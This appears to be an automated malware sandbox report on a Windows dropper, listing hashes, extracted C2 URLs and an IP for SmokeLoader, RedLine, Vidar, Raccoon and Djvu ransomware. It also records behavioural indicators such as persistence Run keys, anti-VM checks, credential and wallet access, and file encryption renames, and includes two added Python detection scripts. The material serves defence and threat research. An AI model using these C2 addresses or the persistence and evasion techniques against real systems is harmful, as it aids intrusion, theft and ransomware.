Analysis
max time kernel: 2701s
max time network: 2693s
platform: windows10_x64
resource: win10-en-20210920
submitted: 23-10-2021 15:47
Static task: static1
Behavioral task: behavioral1 (sample ha.exe, resource win10-en-20210920)

General
Target: ha.exe
Size: 4.9MB
MD5: 2e366651b4505eadbeca48889144f452
SHA1: 4c729b09c03f98019c0cf19fd3f22b7500772f3f
SHA256: 070798072999f8c0c6bdf3c166e42c2eeb2d50a446d2710a2b581c51dd221b3d
SHA512: 6ab6940151b61c03a18b0157e59d4918ac64237cad1f399d0a04d03ecf651145158c84515a2e74a925ea4cc3386b459cc049cd645ec52babc6287ee4127bad5f
Malware Config

Extracted: smokeloader
version: 2020
C2:
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/

Extracted: redline
botnet: ChrisNEW
C2: 194.104.136.5:46013

Extracted: vidar
version: 41.5
botnet: 933
C2: https://mas.to/@xeroxxx
profile_id: 933

Extracted: vidar
version: 41.5
botnet: 937
C2: https://mas.to/@xeroxxx
profile_id: 937

Extracted: raccoon
botnet: 7c9b4504a63ed23664e38808e65948379b790395
url4cnc:
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar

Extracted: djvu
C2: http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6412 | 4472 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 10840 | 4472 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2228 | 4472 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6368 | 4472 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3896 | 4472 | rundll32.exe
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource | yara_rule
behavioral1/memory/4332-294-0x0000000000418542-mapping.dmp | family_redline
behavioral1/memory/4332-286-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exe | family_socelars
-
Suspicious use of NtCreateProcessExOtherParentProcess 7 IoCs
description | pid | process | target process
PID 5444 created 4044 | 5444 | WerFault.exe | Sat14febbc433.exe
PID 5840 created 5028 | 5840 | WerFault.exe | setup.exe
PID 6548 created 5860 | 6548 | WerFault.exe | _0aRxV7zFs9aNhsV38TcVZ3L.exe
PID 7400 created 4536 | 7400 | WerFault.exe | h_tWKtjPYNuVSFdaShBLfLrO.exe
PID 8124 created 8448 | 8124 | dcfbdig | mshta.exe
PID 8652 created 9332 | 8652 | WerFault.exe | GcleanerEU.exe
PID 9776 created 6372 | 9776 | WerFault.exe | safbdig
-
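Added example, not part of the sandbox report: a lineage check over process-creation events that encodes the two rules behind the "Process spawned unexpected child process" and "Suspicious use of NtCreateProcessExOtherParentProcess" signatures above. The first rule flags a parent that should only ever spawn a known set of children (wmiprvse.exe here) creating anything else; the second flags parent-PID spoofing, where the process that called the create API is not the process recorded as the parent. PIDs and image names are taken from the report rows; the recorded-parent and creator columns that the report does not show, and every full path, are assumptions marked in the code. WerFault.exe is the one well-known benign case of the second rule, because the WER service starts it with the faulting process as its nominal parent.

```python
"""Process-lineage checks run over constructed process-creation events.

Added example, not part of the sandbox report. Two rules:
  1. a parent that should not spawn arbitrary children (wmiprvse.exe here)
     spawns something outside its allowlist;
  2. parent-PID spoofing: the process that called the create API is not
     the process recorded as the parent.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcCreate:
    pid: int
    image: str          # leaf image name of the new process
    ppid: int           # parent recorded for the new process
    parent_image: str   # full path of that recorded parent
    creator_pid: int    # process whose thread actually called the create API
    creator_image: str


# Parents whose legitimate children are a small fixed set. wmiprvse.exe only
# creates processes on behalf of WMI callers (Win32_Process.Create), so an
# empty allowlist is the starting point; add your own management agents.
EXPECTED_CHILDREN = {
    r"c:\windows\system32\wbem\wmiprvse.exe": frozenset(),
}

# Created images for which creator != recorded parent is normal: the WER
# service starts WerFault.exe with the faulting process as its parent.
PPID_MISMATCH_BENIGN = frozenset({"werfault.exe"})


def check_lineage(ev: ProcCreate) -> list:
    """Return the rule violations for one process-creation event."""
    findings = []
    parent, child = ev.parent_image.lower(), ev.image.lower()
    allowed = EXPECTED_CHILDREN.get(parent)
    if allowed is not None and child not in allowed:
        findings.append(
            f"unexpected child: {ev.parent_image} ({ev.ppid}) -> {ev.image} ({ev.pid})")
    if ev.creator_pid != ev.ppid and child not in PPID_MISMATCH_BENIGN:
        findings.append(
            f"parent pid spoofing: {ev.creator_image} ({ev.creator_pid}) created "
            f"{ev.image} ({ev.pid}) but the recorded parent is "
            f"{ev.parent_image} ({ev.ppid})")
    return findings


def scan(events) -> dict:
    """Map pid -> findings for every event that violates a rule."""
    out = {}
    for ev in events:
        findings = check_lineage(ev)
        if findings:
            out[ev.pid] = findings
    return out


WMIPRVSE = r"C:\Windows\system32\wbem\wmiprvse.exe"

# Constructed sample. PIDs and leaf image names come from the report rows;
# the recorded-parent/creator columns and the full paths are assumptions.
SAMPLE_EVENTS = [
    ProcCreate(6412, "rundll32.exe", 4472, WMIPRVSE, 4472, WMIPRVSE),
    ProcCreate(10840, "rundll32.exe", 4472, WMIPRVSE, 4472, WMIPRVSE),
    # WER service (svchost.exe, pid and path assumed) starting WerFault.exe for
    # the crashed Sat14febbc433.exe (path assumed): creator != parent, expected.
    ProcCreate(5444, "WerFault.exe", 4044, r"C:\Users\Admin\AppData\Local\Temp\Sat14febbc433.exe",
               1188, r"C:\Windows\System32\svchost.exe"),
    # dcfbdig (path assumed) creating mshta.exe while naming explorer.exe
    # (pid assumed) as the parent: the spoofing pattern.
    ProcCreate(8448, "mshta.exe", 3300, r"C:\Windows\explorer.exe",
               8124, r"C:\Users\Admin\AppData\Roaming\dcfbdig"),
    # ordinary child of a dropper (path assumed): creator and parent agree.
    ProcCreate(2220, "cmd.exe", 3120, r"C:\Users\Admin\AppData\Local\Temp\setup_install.exe",
               3120, r"C:\Users\Admin\AppData\Local\Temp\setup_install.exe"),
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        for f in findings:
            print(pid, f)
```

Both rules need the creator PID, which a plain process-creation event does not carry; on Windows it comes from the ETW/Sysmon event's originating process context rather than from the new process's PEB, which is exactly the field a spoofing parent cannot control.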
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
resource | yara_rule
behavioral1/memory/3108-343-0x0000000000C40000-0x0000000000D16000-memory.dmp | family_vidar
behavioral1/memory/3108-341-0x0000000000400000-0x00000000008EF000-memory.dmp | family_vidar
behavioral1/memory/5844-496-0x0000000000400000-0x00000000008EE000-memory.dmp | family_vidar
behavioral1/memory/5844-512-0x0000000000D70000-0x0000000000E46000-memory.dmp | family_vidar
behavioral1/memory/6120-641-0x0000000000400000-0x00000000008EE000-memory.dmp | family_vidar
-
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurlpp.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libstdc++-6.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS088B1E86\libstdc++-6.dll | aspack_v212_v242
-
Blocklisted process makes network request 64 IoCs
flow | pid | process
90 | 2228 | rundll32.exe
92 | 2228 | rundll32.exe
101 | 2228 | rundll32.exe
102 | 2228 | rundll32.exe
105 | 2228 | rundll32.exe
106 | 2228 | rundll32.exe
191 | 2220 | cmd.exe
192 | 2220 | cmd.exe
987 | 8448 | mshta.exe
1031 | 10040 | powershell.exe
1035 | 10212 | cmd.exe
1120 | 7732 | MsiExec.exe
1126 | 9696 | msiexec.exe
1129 | 9696 | msiexec.exe
1130 | 9696 | msiexec.exe
1158 | 7732 | MsiExec.exe
1205 | 8368 | cmd.exe
1207 | 8368 | cmd.exe
1211 | 8368 | cmd.exe
1269 | 3036 | cmd.exe
1308 | 3036 | cmd.exe
1364 | 8912 | powershell.exe
1366 | 8912 | powershell.exe
1641 | 3036 | cmd.exe
1659 | 11128 | MsiExec.exe
1664 | 11128 | MsiExec.exe
1665 | 11128 | MsiExec.exe
1666 | 11128 | MsiExec.exe
1667 | 11128 | MsiExec.exe
1668 | 11128 | MsiExec.exe
1669 | 11128 | MsiExec.exe
1670 | 11128 | MsiExec.exe
1671 | 11128 | MsiExec.exe
1672 | 11128 | MsiExec.exe
1673 | 11128 | MsiExec.exe
1674 | 11128 | MsiExec.exe
1677 | 11128 | MsiExec.exe
1678 | 11128 | MsiExec.exe
1679 | 11128 | MsiExec.exe
1680 | 11128 | MsiExec.exe
1681 | 11128 | MsiExec.exe
1682 | 11128 | MsiExec.exe
1683 | 11128 | MsiExec.exe
1684 | 11128 | MsiExec.exe
1685 | 11128 | MsiExec.exe
1686 | 11128 | MsiExec.exe
1687 | 11128 | MsiExec.exe
1688 | 11128 | MsiExec.exe
1689 | 11128 | MsiExec.exe
1692 | 11128 | MsiExec.exe
1695 | 11128 | MsiExec.exe
1696 | 11128 | MsiExec.exe
1698 | 11128 | MsiExec.exe
1699 | 11128 | MsiExec.exe
1700 | 11128 | MsiExec.exe
1701 | 11128 | MsiExec.exe
1702 | 11128 | MsiExec.exe
1703 | 11128 | MsiExec.exe
1704 | 11128 | MsiExec.exe
1705 | 11128 | MsiExec.exe
1706 | 11128 | MsiExec.exe
1707 | 11128 | MsiExec.exe
1708 | 11128 | MsiExec.exe
1709 | 11128 | MsiExec.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
description | ioc | process
File opened for modification | C:\Windows\System32\drivers\SETE3B6.tmp | DrvInst.exe
File created | C:\Windows\System32\drivers\SETE3B6.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\drivers\tap0901.sys | DrvInst.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
-
Executes dropped EXE 64 IoCs
pid | process
3212 | CrowdInspect64.exe
1044 | setup_x86_x64_install.exe
2176 | setup_installer.exe
3120 | setup_install.exe
1108 | Sat14d32a38896785b13.exe
3848 | Sat14f1396dfcf191bd.exe
4044 | Sat14febbc433.exe
3628 | Sat142ac5249376e895.exe
512 | Sat14514904a4b.exe
3624 | Sat142b09ae40c44cf.exe
1112 | Sat14b47e86b9c16b.exe
2164 | Sat1481f5a7e3eccdd.exe
2116 | cmd.exe
2228 | Sat1487ca754e680f91.exe
2352 | Sat144474a564d26f29.exe
68 | Sat1427fbafcf251.exe
1412 | Sat1481f5a7e3eccdd.tmp
4200 | Sat1481f5a7e3eccdd.exe
4280 | 5025751.exe
4380 | Sat1481f5a7e3eccdd.tmp
4468 | LzmwAqmV.exe
4672 | 7536159.exe
4780 | 7977000.exe
4804 | BCleanSoft82.exe
4816 | JYCWewAX2vPOJ.EXE
4332 | Sat1427fbafcf251.exe
4888 | 3340470.exe
4928 | werfault.exe
5020 | 7477494.exe
3108 | Conhost.exe
2220 | cmd.exe
860 | 5.exe
2184 | search_hyperfs_206.exe
5028 | setup.exe
4692 | WinHoster.exe
2336 | Calculator Installation.exe
1472 | postback.exe
2116 | cmd.exe
4932 | a6a2ZQhj6hMi6OZQH8Nm4nCs.exe
5320 | kPBhgOaGQk.exe
5512 | x6z6NjXcCh4bSMjVQsnzBW81.exe
5592 | LzmwAqmV.exe
5804 | 7PeayF9Tb5XcknwhFlZFItg1.exe
5844 | XcYMp2GmVj2G6dzAdKSZf0P2.exe
5860 | _0aRxV7zFs9aNhsV38TcVZ3L.exe
5956 | ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe
5988 | B8YkkT0rY7k3CXY_wSzatFSY.exe
6024 | zcwm5iBuVOBi3eEoRbXV0gY2.exe
1932 | B8YkkT0rY7k3CXY_wSzatFSY.exe
816 | zcwm5iBuVOBi3eEoRbXV0gY2.exe
6052 | Hucq3cRU783T_YaR6f0rcMBe.exe
6120 | VcbaY0rxppQvxsF6Dhkdg4_f.exe
4320 | oNHOyUQ3HKSKoT6WvbTWcZUk.exe
5248 | Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
3076 | BeNlWgh16GLAdiYLOwOe1lqZ.exe
5728 | sDpSUCcF7crBKFAL0nlkdsFL.exe
4488 | WerFault.exe
4800 | pkEHV3QnxJNQawwSUY_T9v6l.exe
2952 | DllHost.exe
5132 | ghyLwzsW68yJrRDdcOnQsReb.exe
2204 | 1luUodQBKunwgCepAZE5m_rN.exe
5920 | B_jeA9OMEfd0MmBnOrj56I2B.exe
2684 | Knv5tLGcITqzriOiFtbYIHkp.exe
6116 | Conhost.exe
-
Modifies Installed Components in the registry 2 TTPs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | process
File renamed | C:\Users\Admin\Pictures\ConvertToWrite.raw => C:\Users\Admin\Pictures\ConvertToWrite.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\RevokeMove.raw => C:\Users\Admin\Pictures\RevokeMove.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\AddRename.raw => C:\Users\Admin\Pictures\AddRename.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\ApproveFormat.raw => C:\Users\Admin\Pictures\ApproveFormat.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\OpenExpand.raw => C:\Users\Admin\Pictures\OpenExpand.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\OptimizeUninstall.raw => C:\Users\Admin\Pictures\OptimizeUninstall.raw.zaps | E757.exe
File renamed | C:\Users\Admin\Pictures\UnlockReceive.crw => C:\Users\Admin\Pictures\UnlockReceive.crw.zaps | E757.exe
File opened for modification | C:\Users\Admin\Pictures\DenyRequest.tiff | E757.exe
File renamed | C:\Users\Admin\Pictures\DenyRequest.tiff => C:\Users\Admin\Pictures\DenyRequest.tiff.zaps | E757.exe
-
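Added example, not report content: a rename-burst rule that separates the E757.exe rows above (one process appending the same new extension, .zaps, to files of several original types) from ordinary renames. The rename pairs are the report's; the two trailing benign renames in the sample, and the thresholds, are constructed for contrast.

```python
"""Mass-rename detector for the 'Modifies extensions of user files' rows.

Added example, not part of the report. A ransomware encryptor appends one
new extension to many files of different types; a user renaming files,
or a tool that appends .bak to its own output, does not look like that.
"""
import ntpath
from collections import defaultdict

# (process, old path, new path). The E757.exe rows are the report's; the
# last two entries are constructed benign renames.
RENAMES = [
    ("E757.exe", r"C:\Users\Admin\Pictures\ConvertToWrite.raw", r"C:\Users\Admin\Pictures\ConvertToWrite.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\RevokeMove.raw", r"C:\Users\Admin\Pictures\RevokeMove.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\AddRename.raw", r"C:\Users\Admin\Pictures\AddRename.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\ApproveFormat.raw", r"C:\Users\Admin\Pictures\ApproveFormat.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\OpenExpand.raw", r"C:\Users\Admin\Pictures\OpenExpand.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\OptimizeUninstall.raw", r"C:\Users\Admin\Pictures\OptimizeUninstall.raw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\UnlockReceive.crw", r"C:\Users\Admin\Pictures\UnlockReceive.crw.zaps"),
    ("E757.exe", r"C:\Users\Admin\Pictures\DenyRequest.tiff", r"C:\Users\Admin\Pictures\DenyRequest.tiff.zaps"),
    ("explorer.exe", r"C:\Users\Admin\Documents\draft.docx", r"C:\Users\Admin\Documents\final.docx"),
    ("backup.exe", r"C:\Users\Admin\Documents\notes.txt", r"C:\Users\Admin\Documents\notes.txt.bak"),
]


def appended_suffix(old: str, new: str):
    """Return the extension appended to old to form new, else None."""
    if new.startswith(old) and len(new) > len(old):
        suffix = new[len(old):]
        return suffix if suffix.startswith(".") else None
    return None


def detect_mass_rename(renames, min_files=5, min_original_exts=2):
    """One alert per (process, appended suffix) touching at least min_files
    distinct files that span at least min_original_exts original extensions.
    The extension-diversity floor keeps a single-format tool from tripping
    the rule; the file floor keeps a one-off rename out."""
    groups = defaultdict(set)
    for proc, old, new in renames:
        suffix = appended_suffix(old, new)
        if suffix is not None:
            groups[(proc, suffix.lower())].add(old)
    alerts = []
    for (proc, suffix), files in groups.items():
        # ntpath so the Windows separators are honoured on any host
        orig_exts = {ntpath.splitext(f)[1].lower() for f in files}
        if len(files) >= min_files and len(orig_exts) >= min_original_exts:
            alerts.append({"process": proc, "suffix": suffix,
                           "files": len(files), "original_exts": sorted(orig_exts)})
    return alerts


if __name__ == "__main__":
    for a in detect_mass_rename(RENAMES):
        print(f"{a['process']} appended {a['suffix']} to {a['files']} files "
              f"({', '.join(a['original_exts'])})")
```

In production the grouping window would also be bounded in time; the sandbox rows carry no timestamps, so the example groups over the whole run.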
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 366B.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 366B.exe
-
Checks computer location settings 2 TTPs 13 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | E757.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | 7590801.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Calculator.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Settings.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Settings.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Sat144474a564d26f29.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Qidymacano.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Baekefeletu.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Faster.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | 79BLy9HRraJ1saUAfrFwsTrz.exe
-
Drops startup file 1 IoCs
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk | A2E0.exe
-
Loads dropped DLL 64 IoCs
pid | process
3120 | setup_install.exe
3120 | setup_install.exe
3120 | setup_install.exe
3120 | setup_install.exe
3120 | setup_install.exe
3120 | setup_install.exe
3120 | setup_install.exe
1412 | Sat1481f5a7e3eccdd.tmp
4380 | Sat1481f5a7e3eccdd.tmp
2336 | Calculator Installation.exe
2336 | Calculator Installation.exe
5328 | Conhost.exe
2336 | Calculator Installation.exe
2336 | Calculator Installation.exe
2336 | Calculator Installation.exe
6396 | rundll32.exe
6856 | msiexec.exe
6856 | msiexec.exe
3972 | GKWt8jAAi7IwCqNCN3FGm_q4.tmp
3752 | setup.exe
3752 | setup.exe
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
6516 | Conhost.exe
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
5192 | aDm5wtNVVBVZLktXPpIsLYMC.tmp
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
6268 | setup.exe
6268 | setup.exe
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
7860 | msiexec.exe
7860 | msiexec.exe
3752 | setup.exe
3752 | setup.exe
3388 | Calculator.exe
3752 | setup.exe
3388 | Calculator.exe
3388 | Calculator.exe
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
5064 | setting.exe
6004 | Calculator.exe
8132 | Calculator.exe
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
7836 | installer.exe
7836 | installer.exe
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
8712 | Calculator.exe
8712 | Calculator.exe
8712 | Calculator.exe
8712 | Calculator.exe
8944 | Calculator.exe
8944 | Calculator.exe
8944 | Calculator.exe
9052 | Calculator.exe
9052 | Calculator.exe
9052 | Calculator.exe
9116 | Calculator.exe
9140 | Calculator.exe
9140 | Calculator.exe
9140 | Calculator.exe
9140 | Calculator.exe
9116 | Calculator.exe
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Settings.exe
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Settings.exe
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Settings.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run | aipackagechainer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e016a640-be85-42ec-91ac-8bb6fe5ea86a\\E757.exe\" --AutoStart" | E757.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 3340470.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gituzhuzhaesae.exe\"" | DYbALA.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Settings%20Installation.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Kijeraerilae.exe\"" | DYbALA.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" | setup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | aipackagechainer.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --loGQqfG2tg" | Settings%20Installation.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" | setup.exe
-
Checks for any installed AV software in registry 1 TTPs 3 IoCs
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | powershell.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md8_8eus.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | lighteningplayer-cache-gen.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | note866.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 366B.exe
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | process
File opened (read-only) | \??\Y: | setting.exe
File opened (read-only) | \??\H: | installer.exe
File opened (read-only) | \??\I: | installer.exe
File opened (read-only) | \??\X: | installer.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\O: | svchost.exe
File opened (read-only) | \??\Q: | svchost.exe
File opened (read-only) | \??\S: | svchost.exe
File opened (read-only) | \??\T: | svchost.exe
File opened (read-only) | \??\P: | setting.exe
File opened (read-only) | \??\K: | svchost.exe
File opened (read-only) | \??\B: | installer.exe
File opened (read-only) | \??\Y: | installer.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\Z: | svchost.exe
File opened (read-only) | \??\J: | installer.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\N: | setting.exe
File opened (read-only) | \??\F: | setting.exe
File opened (read-only) | \??\O: | setting.exe
File opened (read-only) | \??\U: | installer.exe
File opened (read-only) | \??\X: | svchost.exe
File opened (read-only) | \??\L: | setting.exe
File opened (read-only) | \??\V: | installer.exe
File opened (read-only) | \??\G: | svchost.exe
File opened (read-only) | \??\P: | svchost.exe
File opened (read-only) | \??\U: | svchost.exe
